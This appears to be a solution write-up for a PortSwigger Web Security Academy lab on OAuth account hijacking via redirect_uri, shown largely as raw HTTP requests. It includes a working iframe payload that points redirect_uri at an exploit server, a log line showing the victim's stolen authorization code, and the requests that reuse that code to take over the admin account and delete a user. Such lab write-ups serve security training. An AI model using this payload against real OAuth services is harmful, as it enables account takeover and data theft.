Port Swigger OAuth account hijacking via redirect
OAuth account hijacking via redirect_uri
Solution
Finding - request with redirect_url
GET /auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Connection: keep-alive
---
GET /interaction/cO63zenFp3eEfMxIiRAQP HTTP/2
Host: oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Referer: https://oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net/auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email
Create exploit
Edit redirect_uri:
redirect_uri=https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net
---
<iframe src="https://oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net/auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>
Read logs
Find a new code for admin
https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net/log
---
...
10.0.3.30 2026-01-08 09:22:49 +0000 "GET /?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
...
Login as admin user
Oauth code: 5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih
https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih
---
GET /oauth-callback?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih HTTP/2
Host: 0aa0005303441e9081eed90a00e7004d.web-security-academy.net
Cookie: session=V9m3j4dovyUTOLDimGhnRXFniMrqcjhd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Delete user: carlos (admin panel)
GET /admin/delete?username=carlos HTTP/2
Host: 0aa0005303441e9081eed90a00e7004d.web-security-academy.net
Cookie: session=AXy0afqbUG3EvnK6rTLR9iIG8FBktyQB
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved